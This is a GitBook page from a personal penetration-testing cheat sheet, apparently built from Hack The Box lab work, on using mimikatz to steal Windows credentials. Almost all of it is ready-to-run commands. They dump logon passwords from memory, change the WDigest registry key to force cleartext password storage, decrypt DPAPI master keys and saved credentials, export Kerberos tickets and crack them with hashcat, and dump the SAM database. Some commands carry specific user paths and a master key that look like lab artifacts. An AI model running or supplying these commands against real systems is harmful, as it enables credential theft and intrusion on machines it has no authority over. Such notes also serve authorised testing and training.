cheatsheet
  • Cheatsheet
  • General
  • NMAP
  • Directory and subdomain Enum
  • SMB and RPC
  • DNS
  • LDAP
  • mimikatz
  • Bloodhound
  • SQL Injection
  • password crack
  • Active Directory
  • Wordpress
  • SQLMAP
  • Gitea
  • DS_Store
  • IIS
  • Cypher Injection
  • MSSQL
  • BackDrop CMS
Powered by GitBook
On this page
  • for the saved logon password
  • DPAPI
  • Extracting Tickets from Memory with Mimikatz
  • Infinite issue
  • SAM Dump

mimikatz

privilege::debug

for the saved logon password

sekurlsa::logonpasswords

  • If the password is null

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

- to check
reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

- restart the system
shutdown /r /t 0 /f

DPAPI

  • to get the master key

.\mimikatz.exe "dpapi::masterkey /in:C:\users\ppotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc" exit

  • getting creds after getting master key

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\18A1927A997A794B65E9849883AC3F3E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

Extracting Tickets from Memory with Mimikatz

Using 'mimikatz.log' for logfile : OK

mimikatz # base64 /out:true
isBase64InterceptInput  is false
isBase64InterceptOutput is true

mimikatz # kerberos::list /export

  • Preparing the Base64 Blob for Cracking

AnuragTaparia@htb[/htb]$ echo "<base64 blob>" |  tr -d \\n > encoded_file

  • Placing the Output into a File as .kirbi

AnuragTaparia@htb[/htb]$ cat encoded_file | base64 -d > sqldev.kirbi

Next, we can use this version of the kirbi2john.py tool to extract the Kerberos ticket from the TGS file.

  • Extracting the Kerberos Ticket using kirbi2john.py

AnuragTaparia@htb[/htb]$ python2.7 kirbi2john.py sqldev.kirbi

This will create a file called crack_file. We then must modify the file a bit to be able to use Hashcat against the hash.

  • Modifying crack_file for Hashcat

AnuragTaparia@htb[/htb]$ sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

  • Cracking the Hash with Hashcat

AnuragTaparia@htb[/htb]$ hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

If we decide to skip the base64 output with Mimikatz and type mimikatz # kerberos::list /export, the .kirbi file (or files) will be written to disk. In this case, we can download the file(s) and run kirbi2john.py against them directly, skipping the base64 decoding step.

Infinite issue

  • use a non-interactive way

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

SAM Dump

lsadump::sam

PreviousLDAPNextBloodhound

Last updated 25 days ago